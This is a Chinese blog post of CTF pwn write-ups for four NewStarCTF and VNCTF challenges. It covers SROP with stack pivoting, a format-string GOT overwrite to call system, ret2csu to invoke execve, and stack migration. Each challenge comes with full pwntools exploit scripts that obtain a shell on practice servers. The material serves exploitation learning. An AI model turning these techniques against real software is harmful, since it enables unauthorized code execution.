PWN练习---Stack_2

已于 2024-08-19 21:50:41 修改
阅读量824 收藏 21
点赞数 25
分类专栏: # PWN 文章标签: 笔记 学习 系统架构 linux
于 2024-08-19 21:47:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74259765/article/details/141335436
版权

目录

srop

题源:[NewStarCTF 2023 公开赛道]srop
考点:SROP + 栈迁移

源码

首先从bss段利用 syscall 调用 write 读出数据信息,然后调用 syscall-read向栈中rbp-0x30 位置读入数据,最多0x300字节。
[Tips:观察到调用 sys_read和sys_weite 时候,eax都是0,并且 rcx 被赋值为 size 部分。则猜测 rdi被当作 rax 使用,rsi,rdx,rcx 分别赋值三个参数。]
联想截图_20240214200827.png
联想截图_20240214200841.png

分析

  1. 利用栈溢出进行栈迁移将rbp寄存器转到bss段高地址。
  2. 然后在返回地址处填写程序调用 syscall-read 处起始地址,用于向rbp-0x30地址写入shell,实现向bss地址读入数据(二次输入)。
  3. 接着填充0x30垃圾数据覆盖到 rbprip地址利用syscall触发 sigreturn 。
  4. 最后布置栈中寄存器的值,调用execve(/bin/sh,0,0)执行shell。

exp

from pwn import *
context(arch = 'amd64',os = 'linux',log_level = 'debug')
elf = ELF('./pwn_1')
#io = remote('node5.buuoj.cn',27296)
io = process('./pwn_1')
pop_rdi = 0x401203

lea = 0x401171  # lea rax,[rbp-0x30]  != leave 

bss = 0x404050  + 0x300
io.recvuntil(b'welcome to srop!\n')
syscall = elf.symbols['syscall']

frame = SigreturnFrame()  # execve(/bin/sh,0,0)
frame.rdi = 59   # "rax" = 0x3b
frame.rsi = bss - 0x30  # /bin/sh 填写地址为 rbp-0x30。====> "rdi"
frame.rdx = 0             #  "rsi"
frame.rcx = 0              #  "rdx"
frame.rsp = bss + 0x38  
frame.rip = syscall    

io.send(b'a'*0x30 + p64(bss) + p64(lea))
io.send(b'/bin/sh\x00' + b'a'*0x30 + flat(pop_rdi,0xf,syscall) + flat(frame))
           # shell + buf +     srop + syscall + framme     [rdi===>"rax"]
io.interactive()

putsorsys

题源:[NewStarCTF 2023 公开赛道]puts or system?
考点:64位fmt + got篡改

源码

存在格式化字符串漏洞,并且注意到已经存在“/bin/sh”参数。
联想截图_20240228130502.png

分析

程序存在多次格式化字符串漏洞。
Step1格式化字符串漏洞(%s + puts_got)泄露puts函数真实地址,利用附件 libc.so 获取 system 函数地址。
Step2:注意到每一次输入后,调用puts函数,并且把 /bin/sh 作为参数,可以再次利用格式化字符串漏洞 将 puts_got 篡改为 system 地址,构造 system(/bin/sh) 获取shell。

exp

#kali打不通...,Xubuntu会断(半通)
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
 
#p =process('./putsorsys')
p =remote('node5.buuoj.cn',26885)
elf =ELF('./putsorsys')
libc =ELF('./libc.so.6')
 
got_addr =elf.got['puts']
p.sendlineafter(b'(0/1)\n',b'1')
payload =b'%9$sAAAA' +p64(got_addr)   #AAAA对齐(4+4=8) %s泄露指针指向内存的数据
p.sendafter(b"What's it\n",payload)
p.recvuntil(b'There is my gift:\n')
 
puts_addr = u64(p.recvuntil(b'\x7f')[:6].ljust(8, b'\x00'))
print(hex(puts_addr))
 
libc_base = puts_addr - libc.sym['puts']
sys_addr = libc_base + libc.sym['system']
bin_sh = libc_base +  next(libc.search(b"/bin/sh\x00"))
 
p.sendlineafter(b'(0/1)\n',b'1')
 
payload =fmtstr_payload(8, {got_addr:sys_addr})
p.sendlineafter(b"What's it\n",payload)
p.interactive()

ret2csu_1

题源:[NewStarCTF 2022 公开赛道]ret2csu1
考点:ret2csu-basic + execve函数使用

源码

联想截图_20240216105046.png
联想截图_20240216105818.png

分析

首先程序存在栈溢出,可以覆盖返回地址。并且给出了后门函数,但是直接转到后门函数并没有任何作用,注意到 0x400648 地址调用了 syscall-execve ,可以利用 __libc_csu_init 函数中的gadget进行劫持。
联想截图_20240216110400.png
先布置gadget并分配好寄存器参数,然后劫持函数执行 execve(/bin/cat,/bin/cat/flag,0) 即可获取flag。查看__libc_csu_init 的汇编代码得到结论:
r13d,r14,r15寄存器的值分别可以被复制到x86-64位程序前三个寄存器 edi,rsi,rdx中,可以构造 execve函数的三个参数。

(虽然r13只有后八字节复制给了edi,但是经过调试发现rdi前八个字节是0,因此等同于 mov r13,rdi。)

同时,注意到存在/bin/cat,/flag字符串,因此构造execve(/bin/cat,/bin/cat/flag,0)

execve(const char *filename, char *const argv[], char *const envp[]);

filename:包含准备载入当前进程空间的新程序的路径名。既可以是绝对路径,又可以是相对路径。
argv[ ] :指定了传给新进程的命令行参数,该数组对应于c语言main函数的argv参数数组,格式也相同,argv[0]对应命令名,通常情况下该值与filename中的basename(就是绝对路径的最后一个)相同。
envp[ ]:最后一个参数envp指定了新程序的环境列表。参数envp对应于新程序的environ数组。

图中第二部分call指令:将r12+rbx*8 的结果作为地址来调用
布置寄存器参数:
rbx:由于第二部分mov,call下面存在add,cmp指令。如果rbx+1 != rbp,那么将会跳转,因此将rbx赋值为0rbp赋值为1,即可避免跳转。
r12:需要填充 数据为0x400648 的地址 来进行调用execve。发现:

.data:0000000000601068 48 06 40 00 00 00 00 00 gift3 dq 400648h
.data:0000000000601068 _data ends
.data:0000000000601068

因此赋值为0x601068
【Tip:不能直接填0x400648,类似于二级跳转。例如调用read函数时也需要填充read的got地址而不是plt地址】
r12,r13,r14分别赋值 0x4007BB,0x601050,0
联想截图_20240216113059.png
联想截图_20240216113022.png

exp

from pwn import *
context(os = 'linux',arch = 'amd64',log_level = 'debug')
elf = ELF('./ret2csu-1')
offset = 0x28
io = remote('node5.buuoj.cn',27959)
#io = process('./ret2csu-1')
pop_6 = 0x40072a
mov_3 = 0x400710

p = b'a'*offset + p64(pop_6) + p64(0)+p64(1) + p64(0x601068) 
p += p64(0x4007BB) +p64(0x601050) + p64(0) + p64(mov_3)
    # execve(/bin/cat,/bin/cat/flag,0)
io.sendafter(b'!\n',p)
io.interactive()

traveler

题源:[VNCTF2023]Traveler
考点:栈迁移(+抬栈)
坑点:bss段需要足够高地址才行。

源码

联想截图_20240216221001.png
联想截图_20240216221010.png

分析

思路1:第一次栈溢出调用向栈中填充数据的read功能代码,fake_rbp填充为bss段地址,然后第二次利用已有的system构造shell,new-fake_rbp填充为bss-0x28地址,再加上leave使得程序回调执行shell。(注意leave后rsp地址为rbp+8)
思路2:system函数的参数填充在第二次输入的bss段,亦可触发。
联想截图_20240216221456.png

exp

from pwn import *
context(os = 'linux',arch = 'amd64',log_level = 'debug')
io = remote('node5.buuoj.cn',29868)
#io = process('./traveler')
offset = 0x20
elf = ELF('./traveler')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']

main = elf.sym['main']

leave = 0x401253
bss_1 = 0x404800 #本地打通的bss地址
bss_2 = 0x404d00 # 远程打通bss地址
pop_rdi = 0x4012c3
ret = 0x40101a
read = 0x401216
p1 = b'a'*offset + p64(bss_2) + p64(read)
io.sendafter(b'u?\n',p1)
io.sendafter(b'life?\n',b'a')

system = elf.sym['system']
bin = bss_2 - 0x8
p2 =  p64(pop_rdi) + p64(bin) + p64(system)  + b'/bin/sh\x00' + p64(bss_2-0x28) + p64(leave)  #思路1
io.send(p2)
io.sendafter(b'life?\n',b'a') #思路2/bin/sh\x00

io.interactive()
暮夜--
关注
专栏目录
攻防世界PWN进阶区(stack2)
BurYiA的博客
01-26 942
stack2 哈,我又回来了 这个题呢,基本rop,但有几个点比较难弄… 比如:偏移不好求,环境没有/bin/bash等… 言归正传,我们先看一下基本信息 32位程序,有NX,有Canary。 运行可以发现它可以创建一个存储数字的数组,创建好以后我们可以对其的数据进行一些基本的操作,ok,接下来开始硬刚IDA 通过观察main函数伪代码我们可以发现上图这个位置有点小问题 这个时对数据进行...
攻防世界 pwn——pwnstack
CNS-Enterprise BCC-1701-J
06-01 1187
攻防世界 做题练习
PWN练习---Stack_1
qq_74259765的博客
06-25 1385
ctf--PWN方向一些做题经历wp
Pwn学习-ret2shellcode
cdl10000的博客
11-04 389
此处有坑,由于环境不匹配,使用vmmap查看没有发现rwxp权限,实际该程序0x804a000 0x804b000 段具备执行权限。使用ida调试发现buf2函数地址0804A080正好位于可执行范围内,因此借用buf2函数来构造shellcode。本内容主要是pwn入门学习,大佬勿喷!------漏洞栈溢出练习。开始要做的工作都一样,查看程序保护措施,查看伪代码,查看敏感函数。没有发现敏感函数,因此需要查找能够执行的段,构造shell函数。再次计算偏移量,计算方法参考。
CTF-PWN学习-为缺少指导的同学而生
热门推荐
yuwoxinanA3的博客
05-11 1万+
入门PWN不可能无痛,但尽量会减轻大家的痛苦,怎么说呢,就像博主在你们前面一步的位置,帮你们挡着一点风浪前进。
pwn -- pwnable.kr -- simple-login---学习stack pivot
YANG12345_6的博客
12-24 301
在看关于pwn的书时学到了 栈帧劫持stack pivot 利用这个例题练习一下。 基本思想: stack pivot利用到的gadget是在函数退出时需要的两条指令:leave(mov esp,ebp;pop ebp);ret;。这两条指令基本都会有。 可以利用这两条指令,通过栈溢出的方式,实现可以完全控制栈。 stack pivot实现的基本方法 (我的理解 通过栈溢出的方式将 我们之后要实现的完全可控的栈的地址写到EBP的地方 写入之后 ,程序第一次leave;ret;,将写入的地址赋给esp。
sniperoj-pwn100-shellcode-x86-64
qq_33769475的博客
12-15 2739
分析 题目下载 查看保护,ret2shellcode类型的题是没有NX保护的 ┌──(root????e267254b2ec9)-[/home/pwn] └─# checksec shellcode [*] '/home/pwn/shellcode' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: P
pwn学习-ret2libc1
Sa1nZen的博客
06-02 221
pwn学习-ret2libc1
Pwn学习-ret2libc三联
cdl10000的博客
11-05 171
正常请求ebp要ret至main函数,因此把此间的变量覆盖成其他的函数地址。此处调试过程需要注意,输入的位置是gets函数,要继续调试至main函数再查看stack,计算此时的偏移量,偏移量为112。此题目与上一题最大的区别就是没有/bin/sh,那么结合攻击思路,需要写一个/bin/sh进去执行。调试过程有坑,需要一个地址能够写进程序,使用IDA调试,发现buf2函数可以写入。继续跟进调试,直至ret至下个main函数,再查看stack。思路一样,减少找函数的过程,提升解题效率。
攻防世界(pwn篇)---level0
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-13 1593
攻防世界(pwn篇)—level0 文章目录攻防世界(pwn篇)---level0题目描述基本情况分析运行分析IDA 分析分析出payloadexp 题目描述 菜鸡了解了什么是溢出,他相信自己能得到shell 基本情况分析 发现只开启了 NX(数据不可执行)保护机制,因此可以做栈溢出漏洞攻击。 1.RELRO: RELRP会有Pratial RELRO 和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表 2.Stack: Canary found 表示不能直接用溢
2021-10-11 Pwn练习记录
m0_56897090的博客
10-11 422
文章目录easy题目分析EXP重做note2分析EXP重做[ZJCTF_2019]Easyheap分析EXP重做actf_2019_babystack分析EXP重做gyctf_2020_borrowstack分析EXP重做ciscn_2019_en_3分析EXP重做bjdctf_2020_YDSneedGrirlfrien分析EXP重做gyctf_2020_some_thing_interesting分析EXP重做ACTF_2019_babyheap分析EXP重做Wustctf2020_easyfast分析
CTF练习 TU-ctf-2016 pwn woO-50
jmp esp
12-07 1154
题目简介大致是可以选择好几个动物,然后可以删除动物题目分析有了上一道题的经验,上来先afl[0x004007f0]> afl 0x004006d8 3 26 sym._init 0x00400710 2 16 -> 32 sym.imp.free 0x00400720 2 16 -> 48 sym.imp.puts 0x00400730 2
Java pwn_2020网鼎杯部分WEB&&PWN题解
weixin_29956903的博客
02-26 983
今年网鼎杯不说啥了,没打进前130,我是菜B比不过各位师傅本文包括四场网鼎的部分WEB和PWN,本着菜鸡应该多练习的原则四场都看了看,除第一场外均为复现。青龙组PWN-boom1[*] '/home/Railgun/Desktop/2020wdb/pwn1'Arch: amd64-64-littleRELRO: Full RELROStack: Canary foundNX: ...
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 2087
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
AIGC学习笔记—minimind详解+训练+推理
m0_56569131的博客
09-27 281
这个开源项目是带我的一个导师,推荐我看的,记录一下整个过程,总结一下收获。这个项目的slogan是“大道至简”,确实很简。作者说是这个项目为了帮助初学者快速入门大语言模型(LLM),通过从零开始训练一个仅26MB的微型语言模型MiniMind,最快可在3小时内完成。降低学习LLM的门槛,让更多人能够轻松上手。MiniMind极其轻量,约为GPT-3的1/7000,适合普通个人GPU进行快速推理和训练。
H.264学习笔记
zfenggo的博客
09-26 828
H.264凭借其出色的压缩效率、灵活的编码方式以及高质量的视频表现,成为了现代视频技术的核心标准之一。它不仅减少了存储需求,还提高了流媒体和实时视频传输的可行性。对于从高清到超高清视频,H.264的编码能力仍然广泛适用。H.264的帧结构设计(I帧、P帧和B帧)极大地提高了视频编码的压缩效率。I帧保存完整的图像信息,P帧通过参考之前的帧减少冗余数据,而B帧则通过双向参考提供进一步的压缩优势。这种帧间的协同工作大幅降低了带宽需求和存储成本,同时保持了视频的高质量。NALU头。
江科大笔记—LED闪烁& LED流水灯& 蜂鸣器
最新发布
m0_62005595的博客
09-28 462
LED闪烁& LED流水灯& 蜂鸣器
攻防世界pwn-forgot
08-10
pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot]...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

暮夜--

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值